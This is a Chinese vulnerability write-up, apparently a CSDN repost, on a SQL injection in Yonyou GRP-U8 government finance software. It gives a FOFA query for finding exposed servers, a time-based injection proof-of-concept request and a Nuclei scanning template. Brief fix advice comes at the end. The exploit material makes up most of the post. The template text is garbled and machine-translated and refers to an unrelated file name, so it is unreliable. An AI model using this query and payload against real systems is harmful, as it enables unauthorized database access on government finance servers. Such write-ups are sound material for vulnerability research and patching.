用友GRP(用友GRP-U8行政事业内控管理软件教程)

用友GRP【产品介绍】
用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。
【漏洞介绍】
用友GR

【产品介绍】

用友GRP-U8R10行政内控管理软件是用友基于云计算技术,专注于国家电子政务推出的新一代产品,是我国行政财务领域最专业的政府财务管理软件。

【漏洞介绍】

用友GRP-U8 obr_zdybxd_check.jsp SQL注入。黑客可以利用该漏洞执行任意SQL语句,包括查询数据、下载数据、创建Web shell、执行系统命令、绕过登录限制等。

【资产测绘Query】

fofa语法:app=\’UFIDA-GRP-U8\’

【产品界面】

【漏洞复现】

【poc】

GET /u8qx/obr_zdybxd_check.jsp?mlid=1%27;WAITFOR%20DELAY%20%270:0:5%27– HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple Web K it/537.36(KHTML、Gecko 等)Chrome/118.0.0.0 Safari/537.36Connection: 关闭

【Nuclei-Poc】

id: yongyou-grp-u8-sql-injectioninfo:name: yongyou grp u8 sql注入author: xxxseverity: highdescription: 使用响应大小和状态代码检查CarCardInfo.aspx中的SQL注入漏洞。 Tags: sqlirequests:- raw3336 0- |-@timeout=5sGET /u8qx/obr_zdybxd_check.jsp ?mlid=1%27;WAITFOR%20DELAY%20%270:0:3%27– HTTP/1.1Host: {{主机名}}用户代理3336 0 Mozilla /5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML、Gecko 等) ) Chrome/118.0.0.0 Safari/537.36Connection: closematchers-condition: andmatchers:- type: dsldsl:- \’duration=3\’- _代码==200\’ 条件: 和

【验证】

.\\nuclei -l 1.txt -t 1.yaml

【修复建议】

1、请联系厂家维修。

2. 除必要外,禁止从公共网络访问本系统。

3. 配置白名单访问。

免责声明:本文所涉及的技术、想法和工具仅供安全学习和交流之用,不得用于任何非法或商业目的。如果您不使用,后果自负。所有进入都需要许可。

以上#UFIDA GRP相关内容来源仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92565.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月27日 下午3:48
下一篇 2024年6月27日 下午3:48

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注